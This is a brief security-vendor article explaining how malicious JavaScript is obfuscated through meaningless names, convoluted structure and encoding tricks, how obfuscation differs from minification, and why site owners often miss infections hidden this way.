Malware distributors try to disguise their intentions. If a function plainly connects to a known criminal site, anti-malware software won't have a hard time catching it. For this reason, malicious JavaScript is usually obfuscated. In other words, the distributor performs various changes on the code to make it hard for both humans and machines to understand. Machines can still run it without problems, but it's hard for them to analyze it. Hard, but not impossible.
Obfuscation falls into several categories:
- Semantic obfuscation uses meaningless names for functions and variables. The code runs the same whether a variable is called "Filename" or "x80," but the latter makes it harder to tell what it's doing.
- Convoluted code structures, such as excessively complicated tests and illogical factoring, likewise impede understanding. They also make the code more prone to bugs.
- Encoding tricks make the code virtually unreadable. They include concatenating strings from decimal character codes, using base64 encoding, and splitting of strings. Some code uses custom obfuscation and de-obfuscation functions.
Obfuscation isn't the same as minification. Minifying code uses some of the same techniques, but its object is to make the code as small as possible, so it will load faster. "Beautifying" tools make minified code more readable, though it's likely to have short, meaningless functions and variable names even after beautifying. Minified code is usually legitimate.
We have found that many site owners insist their site isn't infected, even after ThreatSign determines that it is. They think it's a false positive. However, when we ran a manual analysis, we found that their sites were in fact infected. The malicious code was in an unreadable form that made the problem hard to spot.
Obfuscated malicious JavaScript isn't easy to detect, and it's even harder to understand.